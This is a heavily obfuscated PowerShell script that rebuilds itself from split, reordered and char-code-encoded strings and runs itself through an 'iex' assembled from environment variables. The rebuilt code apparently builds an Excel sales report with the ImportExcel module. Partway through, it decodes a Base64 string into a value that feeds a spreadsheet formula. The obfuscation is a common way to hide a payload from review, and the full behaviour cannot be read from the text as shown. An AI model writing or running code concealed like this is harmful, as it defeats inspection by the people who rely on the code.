((' ((PXg{36}{3}{7}{27}{31}{4}{9}'+'{35}'+'{24}{47}{11}{59}{57}{14}{8}{18}{49}{40'+'}{58}{19}{'+'5}{54}{2}{12}{23}{1}{56}{16}{44}{52}{10}{33}{32}{41}'+'{22}{55}{38}{15}'+'{6}{48}{45}{29}{30}{26}{43}{34}{50'+'}{20}{28}{39}{46}{37}{13}{21}{25}{0}{42}{17}{51}{53}PXg-fYWEWorksheet '+'Ze6{xzQRl}.1I4szQRHEEzQRT11I4 -Range g1 -Value SaLzQRES

&(ZwTSZwT+ZwTet-FoYWE,YWE18ZwT,ZwTal'+'eZwT,ZwT/17ZwT,ZwT,325ZwT,ZwTBlue,ZwT,ZwT1/1ZwT,ZwT/ZwT,ZwTloZwT,ZwT7ZwT,'+'ZwTYu1
CoZwT,ZwT15/201ZwT,ZwT,200
Red,ZwTYWE'+',YWE}{30}YWE,YWEI4e:1I4+1I4Rk1YWE,YWEA0JzQRE2n  ( [TYPE](1I4{1}{0}{2}1I4-fZwTrZw'+'T,ZwTConveZwT,ZwTtZwT) YWE,YWE}{26}{1YWE,YWERmeNSzQRioN1I4.1I4addrzQREsS1I'+'4
&(ZwTSZw'+'T+ZwTet-ForZwT+ZwTmatZwT) -W'+'o'+'rksheet Ze6{xzQRl}.1I4szQRhEezQRYWE,YWEI4+1IYWE,YWETReZwT+ZwTmove-Zw'+'T+ZwTI'+'temZwT) Ze6{xl'+'zQRsOuzQRRCzQREfiz'+'QRlE} '+'-ErrorAction izQRGnYWE,YWE)  ;

try {&(ZwTImport-ModZwT+ZwTuZwT+ZwTleZwT) Ze6pSSzQRcripzQRTrzQROOtp6Z..p6Z..zQRp6ZimPoRtezQRxYWE,YWEZwT
Red'+',ZwT,ZwT,SZwT,ZwT8,250ZwT,ZwTe,ZwT)) -CrePLaCE([ChAR]89+[ChAYWE,YWEZImportExcelExample.xlsx1I4
&(ZwTWrZwT+ZwTiYWE,YWE{29}{12}{16}{22}{6}{4}{10}{25}{1}1I4-f ZwT1/16/2018ZwT,ZwTu1ZwT,ZwT1/1ZwT,ZwT6/201ZwT,ZwTuZwT,ZwTs
ReZwT,ZwTlZwT,ZwT2018ZYWE,YWEValue DzQRAte
.YWE,YWESaZwT+ZwTve ZwT+ZwTlZwT+ZwTocation'+':ZwT+ZwT '+'ZwT+1I4Ze6xlSourcefile1I4)
.(ZwYWE,'+'YWEI4sHeEzQRT11I4'+'.1I4DIzQYWE,YWE,ZwTr,DateZwT,ZwT8ZwT,ZwT,300
YZwT,ZwT5
Zw'+'T,YWE,YWE1I4ShEzQREt11I4 YWE,YWEzQRorE

Ze6{DzQRAtA} = .(ZwTCZwT+ZwTonvertZwT+ZwTFrom-YWE'+',YWE}{8}{33}{15}{28}{7}{21}{2}{3}{24}{27}{18YWE,YWEwT,ZwTADMAZwYWE,YWE(ZwYWE,YWEoNameRange YWE,YWEwT,ZwT
B'+'luZwT'+',ZwTd,1/ZwT,ZwTe,1/17/20YWE,YWE6{xzQRLsYWE,YWETSet-ZwT+ZwTFoZwT+ZwTrmatZwT) -YWE,YWEQRJEzQR2N).ValUe::1I4FrzQRoMBAYWE,YWE4p1I4) ( [typE](1I4{4}{2}{1}{0}{3}1I4-F ZwTODZwT,ZwTXt.EncZwT,ZwTEZwT,ZwTinGZwT,ZwTTZwT));   &(ZwTset-ZwT+ZwTvZwT+ZwTaRIAbYWE,YWET,ZwTY'+'WE,YWE4( (&(ZwTgeT-ZwT+ZwTvARiZwT+Z'+'wYWE,YWETaZwT+ZwTBLEZwT)  a0zYWE,YWElEZwT) YWE,YWEAutoFilter -TablYWE,Y'+'WER]117+[ChAR]49),[ChAR]34)

Ze6{x'+'L} = .(ZwTExpoZwT+ZwTrZwT+'+'ZwTt-ZwT'+'+ZwTEx'+'celZwT) -InputObject Ze6{DzQRATA} -Path Ze6{XzQRLzQRSoURCeFizQRLE} -AutoSize -YWE,YWE(1I4{5}{0}{1}{4}{6}{3}{7}{8}{2}1I4 -f ZwTpAH'+'AAOgA0ADZwT,ZwTgALgAyADQANAZwT,ZwT=='+'ZwT,ZwTAOQAuZwT,ZwTAuZwT,ZwTJwBYWE,YWEcEl.PsD1} catch {throw ; return}


ZeYWE,YWE&(ZwTSetZwT+ZwT-iteZwT+'+'ZwTmZwT)  ('+'1I4'+'vArIaBl1I4+1YWE,YWERange FzQR1 -YWE,YWEesS} = Ze'+'6{Xl}.1YWE,YWENgAnAAZwT)))

.(ZwTSeZwT+ZwTtZwT+Z'+'wT-FormatZwT) -WorYWE,YWE((1I4{19}{17}{23}{31}{11}{5}{9}{20}{YWE,YWEeName sALezQRSINfo -AutYWE,YWErmaZwT+ZwTtZwT) '+'-Workshe'+'et Ze6{XzQRl}.YWE,YWESe64SzQRTzQRRING1I4(YWE,YWEZwT,1ZwT,ZwYWE,YWEG][ChAR]36))
Ze6{ezQRdH}=  Ze6{RzQRkp}::1I4UzQRNzQRIcode1I4.1I4g'+'EzQ'+'RTST'+'rz'+'QRiNg1IYWE,YWEksheet Ze6{XzQRl}.1I4shzQREeT11I4 -Range EzQR1 -Value czQROLOr
.(ZwTSZwT+ZwTet-FoZwT+ZwTrmaZwT+ZwTtZw'+'T'+') -Worksheet Ze6{xl}.1I4shEEzQRT11I4 -YWE,YWEOuRcEfzQRIzQRle} = 1I4Ze6env:TEMPp6YWE,YWET11I4 -Range czQR:C -'+'NumberFormat ((ZwT4eKZwT+'+'ZwT##0ZwT).1I4rePlzQRACe1I4(([ChAR]52+[ChAR]101+[ChAR]75),[STrinYWE,YWECsv'+'ZwT) (YWE,YWEZwT,ZwTADYZYWE,YW'+'E-Range ezQR'+'2 -Value RzQRED

.(ZwTSeZwT+ZwTt-ZwT+ZwTFoZwT+ZwTrmatZwT) -Works'+'heet Ze6{xzQRL}.1I4szQ'+'RYWE,YWET5/ZwT,ZwT1ZwT,Y'+'WE,YWEhezQREt11I4 -R'+'ange EzQR'+'4 -Value salzQREs
&(ZwTSet-FormZwT+ZwTaZwT+ZwTtZwT) -Worksheet Ze6{'+'XzQRl}.1I4szQRheEt11I4 -Range FzQR4 -Formula (ZwT=DSUM({0},1I4Sales1I4,E1:G2)ZwT -f Ze6{DAzQRTazQRBzQRASeadDzQRRE'+'SS}) -Number'+'Forma'+'t (((ZwTLJOZwT+ZwT##0ZwT)-cREpLa'+'cE ([cHAr]76+[c'+'HAr]'+'74+[cHAr]79),[cHAr]36))

.(ZwTCloZ'+'wT+ZwTseZwT+ZwT-EZwT+ZwTxcelPackageZwT) Ze6{xl} -Show

YWE,YWE'+'4}{0}{'+'13YWE,YWE-PassThru

Ze6{DzQRAtazQRBaseAzQRDdRYWE,YWE,ZwT2018,150
BZwTYWE,YWEZwTrboseZ'+'wT'+') -Verbose -Message  (ZwTYWE,YWE32YWE,YW'+'Ete-VeZwT+YWE)).rEplace(YWEZe6YWE,YWEQFqYWE).rEplace(YW'+'EZwTYWE,[strIng][ChAR]39).rEplace(([ChAR]4'+'9+[ChAR]73+[ChAR]52),[strIng][ChAR]34).rEplace(([ChAR]112+[ChAR]54+[ChAR]90),[strIng][ChAR]92).rEplace(YWEzQRYWE,[strIng][ChAR]96) CDU . ( QFqpshoME[21]+QFqPSHomE[34]+YWExYWE)
')  -rePLACE ([CHAR]80+[CHAR]88+[CHAR]103),[CHAR]34-rePLACE ([CHAR]67+[CHAR]68+[CHAR]85),[CHAR]124-rePLACE ([CHAR]81+[CHAR]70+[CHAR]113),[CHAR]36 -creplAce([CHAR]89+[CHAR]87+[CHAR]69),[CHAR]39) |. ( $eNv:coMSPEC[4,26,25]-jOIN'')
